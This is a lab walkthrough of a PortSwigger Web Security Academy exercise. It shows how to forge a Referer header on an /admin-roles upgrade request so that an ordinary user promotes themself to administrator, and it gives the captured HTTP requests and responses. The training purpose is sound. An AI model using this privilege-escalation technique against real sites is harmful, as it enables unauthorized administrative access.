| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Referer Header Bypass) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Referer-Based Access Control¶
Log in as administrator:admin.
Same upgrade/downgrade user list as the previous labs. Upgrading a user and intercepting:
GET /admin-roles?username=carlos&action=upgrade HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=AbBWdQfhOm82O7Y3cU8cE1d7StU6L98N
Referer: https://0a5900890328db7480793f7b00f00013.web-security-academy.net/admin
A single GET this time, and the response is:
HTTP/2 302 Found
Location: /admin
Following the redirect, carlos is upgraded. Notably the request carries a Referer header pointing back to /admin. Logging in as wiener:peter. Intercepting /my-account:
GET /my-account?id=wiener HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm
Switching to the admin-roles endpoint, targeting our own username, and adding the same Referer header pointing at /admin:
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm
Referer: https://0a5900890328db7480793f7b00f00013.web-security-academy.net/admin
302. Following the redirect:
wiener now has admin privileges lab solved... It was good to have this two sections (Path Traversal & Access Control Vulns) to rest a little after HTTP Request Smmugling